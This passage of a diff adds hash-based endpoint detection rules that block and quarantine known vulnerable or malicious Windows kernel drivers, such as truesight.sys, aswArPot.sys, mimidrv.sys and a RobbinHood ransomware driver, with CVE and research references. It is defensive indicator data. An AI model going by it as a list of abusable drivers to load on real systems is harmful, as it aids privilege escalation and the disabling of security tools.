+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d500f10df3b61bef3060820d27fff5f3f4559ae38c9e591a94d429385f75f08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c11cdbc5-4973-58e4-b0a4-f2566e2d553f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983578Z",
+ "creation_date": "2026-03-23T11:45:29.983580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96bf3ee7c6673b69c6aa173bb44e21fa636b1c2c73f4356a7599c121284a51cc",
+ "comment": "Malicious Kernel Driver (aka ntbios.sys) [https://www.loldrivers.io/drivers/eef1fcf4-8c54-420b-8d38-9c5f95129dcc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c12d3150-a651-5c25-98f6-1e0853cc1888",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614770Z", + "creation_date": "2026-03-23T11:45:29.614772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1343970-616f-59a3-9a1a-7f7bccc41961", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819192Z", + "creation_date": "2026-03-23T11:45:30.819194Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"43dc82fd548218f0e916687c997291c8056dfdcc5b5f5616833437f96d806a64", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1394bff-8005-59f3-b0d0-a44be27e95d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968493Z", + "creation_date": "2026-03-23T11:45:29.968496Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b542e47248611a1895018ec4f4033ea53464f259c74eb014d018b19ad818917", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c13f03b8-df2b-5c0c-afe8-731cce49d2aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604591Z", + "creation_date": "2026-03-23T11:45:29.604593Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604598Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7128d13dc4269de832723d4a3a6cfd7e6553576a9e96464583eb8bb5c2f243aa", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1414d27-3441-5ddf-b95d-7ab1d8b3e873", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489526Z", + "creation_date": "2026-03-23T11:45:31.489529Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fedac4fe88aef03b44adcd23f94ce04074f75e44bc97ac9978f7f8909023e18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1430da3-6b1b-5e66-a30b-94a23d763e8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145772Z", + "creation_date": "2026-03-23T11:45:32.145774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d61e4ea1b1294d5a042feb152dc5f9aa1397c45c3ed583621279dd4e69be418", + "comment": "Malicious Kernel Driver (aka driver_5d61e4ea.sys) [https://www.loldrivers.io/drivers/0215d6d6-e0c4-4a11-bd3a-40511f89d736/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c151b015-f21a-5030-9e76-0d847fd8f071", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614198Z", + "creation_date": "2026-03-23T11:45:29.614200Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614205Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7018d515a6c781ea6097ca71d0f0603ad0d689f7ec99db27fcacd492a9e86027", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1577801-288d-57d6-9062-eb61e423dd18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160588Z", + "creation_date": "2026-03-23T11:45:31.160590Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab11747906d1db3ab3adeeab2d0f14b20edad4064064f80c3860746448e56608", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c15b6516-cd5b-576f-ab09-746c3fed886b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488187Z", + "creation_date": "2026-03-23T11:45:31.488189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1132883b99e795f19ce643184b1e3d33e1801fe19c6718ebcf2ca6f257a6b6ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c169d28e-ac73-5064-ac6e-6b0d1b4bbfe7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980133Z", + "creation_date": "2026-03-23T11:45:29.980135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "16e2b071991b470a76dff4b6312d3c7e2133ad9ac4b6a62dda4e32281952fb23", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c169e4f7-e705-53f8-8d26-442e55a60725", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831848Z", + "creation_date": "2026-03-23T11:45:30.831851Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7966e3d959150caebd4dd5dbaeae68fe28013a4043636ccf6350fda847c46bc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c16a92d0-c385-519e-8145-d7cb56bb80f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476904Z", + "creation_date": "2026-03-23T11:45:30.476907Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0b918d766e6ce4218a833314525dd6eaeba83c597e9e1a9efefa7f95ec64a95", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c171752c-95f4-5c24-9ca4-65627d5880a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836789Z", + "creation_date": "2026-03-23T11:45:30.836792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "247058a37cd8d8e09ac4e498578bf188f32ed2beb8858c8363e0651e1f67a0fe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c17d0e3e-6b21-5224-8f35-96c8922bbd89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160513Z", + "creation_date": "2026-03-23T11:45:31.160515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2f78cd04121615119903f0aded0bf383e5a8c7fb3f03f34a9b93aa5dbe5c20c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c187152c-19cd-5135-8567-3fcaa493a61f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465821Z", + "creation_date": 
"2026-03-23T11:45:30.465824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a42fa1870472c38a56c0a70f62e57a3cdc0f5bc142f3a400d897b85d65800ac", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c18a3ce5-35c5-5b68-8331-a9d2991ffd99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969716Z", + "creation_date": "2026-03-23T11:45:29.969718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969723Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fab3f1dbc49bd9f0219156fe49d4423c311f529f7d3653f5f69d2b10b9b0bc98", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c193c419-54b5-5981-aff5-3b73bf831af3", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613312Z", + "creation_date": "2026-03-23T11:45:29.613314Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bf974f5d3489638a48ee508b4a8cfa0f0262909778ccdd2e871172b71654d89", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1a6fc31-6b00-53fb-82f9-b931ebf85818", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609593Z", + "creation_date": "2026-03-23T11:45:29.609595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609601Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "610dff57f635693812337813a3f03bb1c3c6b7b6cf5c3f39fbc334ff2a73b69a", + "comment": "RobbinHood ransomware malicious driver (aka rbnl.sys) [https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1b0e20e-7745-5a77-8598-ba3f68b2f610", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819464Z", + "creation_date": "2026-03-23T11:45:31.819466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819474Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62a27ad4d031df0740e7d56b8a5a3f0cf6049a5e61605ea960380d1d9f3b03dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1b19a4a-418e-5039-9ef0-05cf19e4e614", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160175Z", + "creation_date": "2026-03-23T11:45:31.160179Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160187Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8e2c11c898653b7a85003685aeae9e960cc1f562b8a4429dbe0fbfc254764ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1b689fa-3785-57f4-a8ed-265fd004622c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492896Z", + "creation_date": "2026-03-23T11:45:31.492899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492908Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"f0436088396d3fda62bc30d7cd1c68f532f538784ec265a54eb42c324d2a8b63", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1b97270-149b-570e-9be6-dc511bf5f320", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610958Z", + "creation_date": "2026-03-23T11:45:29.610960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3966d4b1e4f5442b8507f91b6dbde3523657b47fd2945d990249605727d231ec", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1bb1d40-6c25-593a-ac83-c339a837c519", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972020Z", + "creation_date": "2026-03-23T11:45:29.972022Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972028Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77c5e95b872b1d815d6d3ed28b399ca39f3427eeb0143f49982120ff732285a9", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1d1ff91-9ab1-5a32-937a-a5db85e3f406", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 